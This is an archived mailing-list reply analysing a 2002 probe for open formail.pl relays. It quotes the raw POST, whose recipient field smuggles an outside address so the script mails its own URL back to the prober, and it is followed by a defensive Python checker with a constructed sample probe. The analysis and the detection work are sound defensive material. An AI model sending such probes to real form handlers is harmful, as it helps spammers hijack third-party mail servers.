Security Incidents mailing list archives
Re: new type of formmail probes
From: "Kerry Thompson" <kerry () crypt gen nz>
Date: Fri, 6 Sep 2002 09:12:59 +1200 (NZST)
Hi Russell

I don't see any fancy unicode or DOS commands in here, so I would say it is a relatively harmless probe for open formmail relays, probably for spam use. There are a number of automated tools that look for old formail.pl programs to exploit as relays.

The POST translated to plain text follows (the backslash breaks are mine for readability):

---------------------------------------------------------------
POST /cgi-bin/formail.pl HTTP/1.0
Via: 1.0 SERVER
Connection: Keep-Alive
Content-Length: 402
User-Agent: Mozilla/4.06 (Win95; I)
Content-Type: application/x-www-form-urlencoded
Host: www.cs.auckland.ac.nz
Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
Referer: www.cs.auckland.ac.nz

email=daa18 () fdj10 com&recipient=<iikestyx () aol com>www.cs.auckland.ac.nz\
&subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52\
&= time/date: 08:20:19pm / 09/04/2002 <A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
www.cs.auckland.ac.nz/cgi-bin/formail.pl</A> oxy52
---------------------------------------------------------------

It seems to be probing formail and getting it to send an Email back to the spammer containing a URL for the vulnerable formail. I've checked Google for "oxy52" but found nothing, it's probably just a tag for whoever is receiving the mail.

Kerry

Russell Fulton said:
Hi All, Over the last week or so snort has been picking up many probes like this:
[snip]

--
Kerry Thompson, CISSP
Information Systems Security Consultant
http://www.crypt.gen.nz kerry () crypt gen nz

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
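A defender-side check for the request pattern described in the message above, added here as an example; it is not part of the original post or of any formmail distribution. The function names, the allow-list, the script-name pattern and the sample requests (built on example.* placeholders) are all assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: domains this site's form handler may legitimately mail to.
ALLOWED_DOMAINS = {"example.edu"}
# Assumption: matches formail / formmail / form-mail script names.
FORM_SCRIPT = re.compile(r"/for(m[-_]?)?mail(\.pl|\.cgi)?$", re.I)
ADDRESS = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")


def recipient_domains(value):
    """Return the domain of every mail address embedded in a recipient value."""
    return {m.group(1).lower() for m in ADDRESS.finditer(value)}


def check_post(path, host, body):
    """Return a list of findings for one POST to a form-to-mail script."""
    findings = []
    if not FORM_SCRIPT.search(path.split("?")[0]):
        return findings
    fields = parse_qs(body, keep_blank_values=True)
    for value in fields.get("recipient", []):
        outside = recipient_domains(value) - ALLOWED_DOMAINS
        if outside:
            findings.append("off-site recipient: " + ", ".join(sorted(outside)))
        # A suffix test on the raw value is satisfied by text placed after
        # the address, so compare parsed address domains instead.
        if outside and value.lower().endswith(host.lower()):
            findings.append("local host name appended to recipient")
    text = " ".join(v for vs in fields.values() for v in vs).lower()
    if (host + path).lower() in text:
        findings.append("message reports this script's own URL")
    return findings


# Constructed sample requests (addresses and hosts are placeholders).
HOST = "www.example.edu"
PROBE = ("email=a%40example.net&recipient=%3Ccollector%40example.org%3E"
         "www.example.edu&subject=www.example.edu/cgi-bin/formail.pl+tag01")
NORMAL = "email=visitor%40example.net&recipient=webmaster%40example.edu&subject=Hello"

if __name__ == "__main__":
    for name, body in (("probe", PROBE), ("normal", NORMAL)):
        print(name, check_post("/cgi-bin/formail.pl", HOST, body))
```

The same domain comparison can be applied inside the form handler itself, so that a recipient outside the allow-list is rejected before any mail is sent.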